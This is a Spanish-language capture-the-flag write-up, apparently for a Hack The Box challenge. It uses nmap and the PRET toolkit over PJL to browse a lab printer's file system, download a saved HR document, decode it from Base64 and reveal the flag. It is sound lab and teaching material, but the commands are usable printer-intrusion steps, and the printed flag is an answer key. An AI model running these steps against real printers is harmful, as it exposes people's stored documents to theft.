Gawk
3 minutos de lectura
Se nos dice que alguien necesita ayuda con una impresora. Solo tenemos una dirección IP y un puerto. nmap no muestra información útil:
$ nmap -Pn -sV 167.99.207.74 -p 32108
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 167.99.207.74
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
32108/tcp open unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds
Uso de PJL
Después de leer un poco sobre explotación de impresoras, encontré PRET, que es una herramienta para interactuar con impresoras usando PostScript o PJL (lenguajes de impresoras). Funciona con Python versión 2, así que vamos a usar un contenedor de Docker:
$ docker run --rm -v "${PWD}":/home/rocky -it python:2.7 bash
root@48962fe51979:/# pip2.7 install colorama
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting colorama
Downloading colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Installing collected packages: colorama
Successfully installed colorama-0.4.6
WARNING: You are using pip version 20.0.2; however, version 20.3.4 is available.
You should consider upgrading via the '/usr/local/bin/python -m pip install --upgrade pip' command.
root@48962fe51979:/# python2.7 /home/rocky/PRET/pret.py 167.99.207.74:32108 pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to 167.99.207.74:32108 established
Device: hp LaserJet 4200
Welcome to the pret shell. Type help or ? to list commands.
167.99.207.74:32108:/>
Vemos que nos hemos conectado con éxito a una impresora HP LaserJet. Podemos usar estas opciones:
167.99.207.74:32108:/> ?
Available commands (type help <topic>):
=======================================
append delete edit free info mkdir printenv set unlock
cat destroy env fuzz load nvram put site version
cd df exit get lock offline pwd status
chvol disable find help loop open reset timeout
close discover flood hold ls pagecount restart touch
debug display format id mirror print selftest traversal
Por ejemplo:
167.99.207.74:32108:/> pwd
0:/
167.99.207.74:32108:/> ls
d - PJL
d - PostScript
d - saveDevice
d - webServer
Enumeremos todos los archivos y directorios con find:
167.99.207.74:32108:/> find
/PJL/
/PostScript/
/saveDevice/
/saveDevice/SavedJobs/
/saveDevice/SavedJobs/InProgress/
/saveDevice/SavedJobs/InProgress/HR_Policies.pdf
/saveDevice/SavedJobs/KeepJob/
/webServer/
/webServer/default/
/webServer/default/csconfig
/webServer/home/
/webServer/home/device.html
/webServer/home/hostmanifest
/webServer/lib/
/webServer/lib/keys
/webServer/lib/security
/webServer/objects/
/webServer/permanent/
Hay un archivo que destaca (HR_Policies.pdf). Vamos a cogerlo:
167.99.207.74:32108:/> get /saveDevice/SavedJobs/InProgress/HR_Policies.pdf
41893 bytes received.
167.99.207.74:32108:/> exit
Esperaba un archivo PDF, pero solo son datos en ASCII (de hecho, una cadena codificada en Base64):
root@48962fe51979:/# file HR_Policies.pdf
HR_Policies.pdf: ASCII text
root@48962fe51979:/# cat HR_Policies.pdf
JVBERi0xLjQKJdPr6eEKMSAwIG9iago8PC9UaXRsZSAoQm9vayByZXBvcnQpCi9Qcm9kdWNlciAo
U2tpYS9QREYgbTk0IEdvb2dsZSBEb2NzIFJlbmRlcmVyKT4+CmVuZG9iagozIDAgb2JqCjw8L2Nh
IDEKL0JNIC9Ob3JtYWw+PgplbmRvYmoKNiAwIG9iago8PC9UeXBlIC9YT2JqZWN0Ci9TdWJ0eXBl
IC9JbWFnZQovV2lkdGggNDcKL0hlaWdodCA2Ci9Db2xvclNwYWNlIC9EZXZpY2VSR0IKL0JpdHNQ
ZXJDb21wb25lbnQgOAovRmlsdGVyIC9GbGF0ZURlY29kZQovTGVuZ3RoIDE5Pj4gc3RyZWFtCnic
k1v1UW4UjaJRRA0EAO2J5doKZW5kc3RyZWFtCmVuZG9iago3IDAgb2JqCjw8L1R5cGUgL1hPYmpl
Y3QKL1N1YnR5cGUgL0ltYWdlCi9XaWR0aCAxMjAwCi9IZWlnaHQgMzAKL0NvbG9yU3BhY2UgL0Rl
dmljZVJHQgovQml0c1BlckNvbXBvbmVudCA4Ci9GaWx0ZXIgL0ZsYXRlRGVjb2RlCi9MZW5ndGgg
MTMzPj4gc3RyZWFtCnic7cIxDQAADAMgJ/WfuquD2dgBIV1UVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVfXrA40qTc8KZW5kc3RyZWFtCmVuZG9iago4IDAgb2Jq
...
MCBuIAowMDAwMDIyNjUwIDAwMDAwIG4gCjAwMDAwMjMxMzQgMDAwMDAgbiAKMDAwMDAyOTQ4NSAw
MDAwMCBuIAowMDAwMDI5NzE0IDAwMDAwIG4gCjAwMDAwMjk5NDEgMDAwMDAgbiAKdHJhaWxlcgo8
PC9TaXplIDI4Ci9Sb290IDE1IDAgUgovSW5mbyAxIDAgUj4+CnN0YXJ0eHJlZgozMDM3MgolJUVP
Rg==
Entonces, vamos a decodificarla y a guardar el archivo como PDF:
root@48962fe51979:/# base64 -d HR_Policies.pdf > /home/rocky/HR_Policies.pdf
root@48962fe51979:/# file /home/rocky/HR_Policies.pdf
/home/rocky/HR_Policies.pdf: PDF document, version 1.4
root@48962fe51979:/# exit
exit
Flag
Si abrimos el PDF, veremos la flag en la primera página:
HTB{tr4v3rs3_m4n4g3ment_d3240!}